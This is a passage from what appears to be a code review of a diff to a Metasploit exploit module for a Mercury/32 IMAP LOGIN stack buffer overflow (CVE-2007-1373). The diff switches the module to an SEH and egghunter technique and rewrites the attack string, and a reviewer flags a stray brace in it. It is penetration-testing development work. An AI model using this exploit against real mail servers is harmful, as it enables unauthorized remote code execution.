modules/exploits/windows/imap/mercury_login.rb

```diff
@@ -4,87 +4,79 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = AverageRanking
+  Rank = NormalRanking
 
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::Remote::Egghunter
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Mercury/32 LOGIN Buffer Overflow',
-      'Description'    => %q{
+      'Name' => 'Mercury/32 less or equal than 4.01b LOGIN SEH Buffer Overflow',
+      'Description' => '
         This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD
         LOGIN verb. By sending a specially crafted login command, a buffer
         is corrupted, and code execution is possible. This vulnerability was
         discovered by (mu-b at digit-labs.org).
-      },
-      'Author'         => [ 'MC' ],
+      ',
+
+      'Author'         => ['MC','Ivan Racic'],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'CVE', '2007-1373' ],
-          [ 'OSVDB', '33883' ],
+          ['CVE', '2007-1373'],
+          ['OSVDB', '33883']
         ],
       'Privileged'     => true,
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC' => 'thread'
         },
       'Payload'        =>
         {
-          'Space'    => 800,
-          'BadChars' => "\x00\x0a\x0d\x20",
-          'StackAdjustment' => -3500,
+          'BadChars' => "\x0a\x0d\x20"
         },
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Windows 2000 SP0-SP4 English',		{ 'Ret' => 0x75022ac4 } ],
-          [ 'Windows XP Pro SP0/SP1 English',		{ 'Ret' => 0x71aa32ad } ],
-        ],
-      'DisclosureDate' => 'Mar 6 2007',
-      'DefaultTarget'  => 0))
-
+          ['Windows Universal',
+            {
+              'Ret' => 0x00401460
+            }]
+          ],
+        'DisclosureDate' => 'Mar 6 2007',
+        'DefaultTarget'  => 0))
     register_options(
       [
         Opt::RPORT(143)
-      ])
+      ], self.class
+    )
   end
 
   def check
     connect
     resp = sock.get_once
     disconnect
+    return Exploit::CheckCode::Vulnerable if resp =~ /Mercury\/32 v4\.01[a-b]/
 
-    if (resp =~ /Mercury\/32 v4\.01[a-b]/)
-      return Exploit::CheckCode::Appears
-    end
-      return Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe
   end
 
   def exploit
+    hunter, egg = generate_egghunter(payload.encoded)
     connect
     sock.get_once
-
     num = rand(255).to_i
-
-    sploit = "A001 LOGIN " + (" " * 1008) + "{#{num}}\n"
+    sploit = 'A001 LOGIN ' + "\x20" * 1008 + "{#{num}}}\n"
```

Comment:
It looks like an extra `}` snuck in here. Was that intentional?
```suggestion
    sploit = 'A001 LOGIN ' + "\x20" * 1008 + "{#{num}}\n"
```